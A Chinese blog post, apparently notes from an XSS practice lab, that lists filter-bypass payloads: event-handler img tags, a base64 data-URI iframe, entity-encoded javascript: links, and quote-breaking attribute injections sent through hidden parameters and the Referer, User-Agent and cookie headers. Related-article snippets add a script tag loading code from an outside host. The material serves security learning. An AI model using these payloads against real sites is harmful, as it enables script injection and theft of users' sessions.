xss注入绕过

于 2025-03-12 16:54:56 发布
阅读量342 收藏 8
点赞数 4
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46729014/article/details/146209377
版权

xss注入

常见绕过方法:

单/双引号越过

“><”、'><'构造闭合越过

大小写越过

双写绕过

img绕过
<img src='666' onerror=alert()>

当src路径错误时,触发onerror代码

<img src=666 onmouseout="alert()">

当鼠标移出图片时执行onmouseout

<img src=1 onmouseover="alert()">

当鼠标移入图片时执行onmouseover

data绕过
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+">

这里利用iframe标签,插入一个标签****data:text/html;base64,**** 将后面的内容进行base64解码,PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+进行base64解码后是

Unicode编码绕过

这关我们可以看到,我们输入的内容直接被放到了超链接中,我们直接构造javascript:alert()即可
请添加图片描述请添加图片描述

使用Unicode编码绕过

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

href属性自动解析Unicode编码

代码审计

图中我们能看到:当传入的值没有http://则false=false报错

img

我们可以在payload中加入http://并用注释符注释掉即可

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/*http://*/
传参绕过

img

图中我们可以看到,有一个隐藏传参t_sort它的type被隐藏了,我们要把它显示出来,添加type=“text”

?t_sort=" onfocus=javascript:alert() type="text
        ^                                      ^
     此处闭合前面的引号                     此处是为了和后面的引号闭合
Referer传参(这个没懂)11关

在请求头中插入xss代码

Referer: " onfocus=javascript:alert() type="text

大致思路为通过get和post传参都失败了,推测为Referer传参,请求成功

测试payload

t_link=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>&t_history=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>&t_sort=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>
UA传参

由图中得知,该请求为User-Agent请求

请添加图片描述

通过抓包请求UA,图中得知,该input被隐藏,所以使用type="text“来回显

" onfocus=javascript:alert() type="text
cookie注入

由该源码推测cook有可能为cookie注入

<input name="t_cook"  value="" type="hidden">

查看开发者工具发现cookie正好为user

请添加图片描述

构造payload

" onfocus=alert() type="text

请添加图片描述

脚底儿
关注
XSS攻击绕过方法以及绕过waf方法语句大全 XSS攻击语句这一篇足够
浩策盾悟
12-31 1万+
1. 使用HTML实体编码 2. 大小写混合 3. 利用JavaScript事件 4. 利用URL编码 5. 使用不完整的HTML标签 6. 利用编码绕过 7. 使用不寻常的标签 8. 利用CDATA 9. 利用注释 10. 使用文档对象模型(DOM) 11. 利用HTML5功能 12. 使用特殊字符 13. 利用外部脚本 14. 使用IFrame 15. 利用CSS注入 16. 使用数据URI 17. 利用SVG 18. 使用Base64编码 19. 利用JavaScr
XSS绕过技术学习总结
1匹黑马
02-23 2878
文章目录XSS分类发现XSS漏洞转义字符串绕过单引号过滤绕过< SCRIPT>过滤绕过使用IMG源绕过使用制表符、 换行符和回车符绕过使用空字符进行绕过双引号配对绕过CSS过滤器绕过不全面的过滤器 XSS分类 非持久型 非持久性:非持久性 XSS 也被称为反射性 XSS,是目前最普遍的类型,当攻击者提供了一些代码的时候,服务器端马上就会返回页面的执行结果。举个例子,就比如某个网页上...
XSS过滤绕过
qq_39654116的博客
01-17 5872
目录过滤测试示例输入在script标签中非常规的事件监听HREF内容可控变换JavaScript变换Vbscript变换输入在属性里JSONSVG标签浏览器bug常见标签利用link远程包含js文件javascript伪协议属性payload常用的payload各种alert伪协议Chrome XSS auditor bypass长度限制jquery sourceMappingURL图片名过期的payloadcssmarkdowniframeformmeta绕过过滤空格大小写混淆双写绕过字符拼接编码绕过编码
(27)【xss绕过】一般测试步骤、绕过方法:触发事件、干扰、编码……
04-03 8076
XSS绕过-合集】
XSS绕过技巧
weixin_52501704的博客
02-10 4938
XSS绕过技巧
浅谈XSS攻击的那些事(附常用绕过姿势)
qq_42801460的博客
03-29 1677
有的时候,服务器往往会对代码中的关键字(如alert)进行过滤,这个时候我们可以尝试将关键字进行编码后再插入,不过直接显示编码是不能被浏览器执行的,我们可以用另一个语句eval()来实现。由于盗取的cookie需要传回给攻击者,因此往往需要一个服务器来接收盗取的cookie,这也就是xss平台的作用了。也就是攻击相对于访问者而言是一次性的,具体表现在我们把我们的恶意脚本通过url的方式传递给了服务器,而服务器则只是不加处理的把脚本“反射”回访问者的浏览器而使访问者的浏览器执行相应的脚本。
Xss漏洞常见绕过过滤攻击场景
最新发布
chaottop的博客
05-04 3279
在某些情况下,后台作的过滤非常简单,只对一些特殊的字符串作黑名单过滤,导致可直接通过字母大小写绕过后台的过滤。如下例子
mysql 注入 绕过防火墙_新型渗透手法:利用XSS绕过WAF进行SQL注入
weixin_39852491的博客
02-18 327
*本文作者:风之传说,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。0×00 前言看到标题,很多人肯定会一脸懵逼,这是什么鬼。利用xss绕过waf进行sql注入?话说,没点意思的文章,我自己也不好意思写出来啊。通俗讲,就是XSS和sql注入相结合绕过waf。知识要能灵活运用嘛。做一个灵活的胖子(虽然我不是胖子)。0×01起因咳咳,还是来说下起因吧!最近遇到一个网站,有防火墙,而且极其变...
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
XSS绕过技术
10-11
但是,即使测试代码未执行,也不能立即断定网站是安全的,因为攻击者可能采用不同的技术绕过过滤器。 为了绕过网站的安全过滤,攻击者可能会采用多种技术。首先,他们需要检查页面源代码,看看注入的测试字符串是否...
xss绕过方法
sinri的博客
01-30 4705
xss绕过方法 1.改变大小写 将大小写穿插编写 <script>alert(“xss”);</script> 可以转换为: <ScRipt>ALeRt(“XSS”);</sCRipT> 2.关闭标签 利用大于号>关闭标签使得xss生效 ><script>alert(“Hi”);</script> 3.利用html标签触发事件 很多标签都可以对过滤进行绕过 格式:< 标签 事件 = 执行语句 例如: <p
XSS绕过总结
热门推荐
qq_42990434的博客
05-29 1万+
有时候明明有一个xss漏洞,但是却有xss过滤规则或者WAF保护导致我们不能成功的利用,这些会屏蔽掉我们的代码,会导致我们执行完代码之后什么反应都没有,这时候我们可以审查一下元素,看看我们的代码有没有替换为空,或者替换成其他东西,或者那些符号被过滤掉了。 比如:我们输入<script> alert(“hi”) </scrip>, 会被转换成<script> alert(>xss detected<) </scrip>,这样的话我们的js语句就不生效
我的渗透笔记之XSS绕过技巧
xf555er的博客
03-03 1万+
1、单引号、双引号和尖括号之间的闭合。 有些标签例如,构造的payload应该为” >,那么组成的标签为<input value=""><script>alert(1)</script>" 2、尖括号被转义,利用注释符号和一些属性事件. 例如,构造payload为" οnclick=alert(1)//,组成的标签为<input value="" o...
XSS 绕过指南
weixin_51681694的博客
04-22 1775
因为各种原因,在此总结一下网络上的绕过方法以及个人的经验,会不断更新,若有错误请私信
xss绕过尖括号和双括号_XSS过关wp(未完待续,目前13)
weixin_42309456的博客
12-16 886
1.LEVEL 1审计源码:注意这几行:<?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?> GET方式传送一个参数name ,然后直接拼接echo所以给name直接传个最简单的xss弹窗即可:2.LEVEL...
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧
m0_67844671的博客
10-18 2014
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧;你知道xss如何绕过吗?本篇讲述了一些xss常见的绕过手法及技巧,包括双写,大小写绕过,编码绕过等,过来看看吧
XSS 绕过常用语句
Mr.Huang_的博客
09-16 4122
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
XSS攻击绕过技巧详解
若系统加载了特定的外部资源(如`1.js`),攻击者可以通过设置`<base>`标签来改变页面的基URL,结合其他XSS技巧,可能绕过过滤规则并注入恶意脚本。 以上这些绕过策略提醒我们在实施Web应用安全防御时,需要全面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值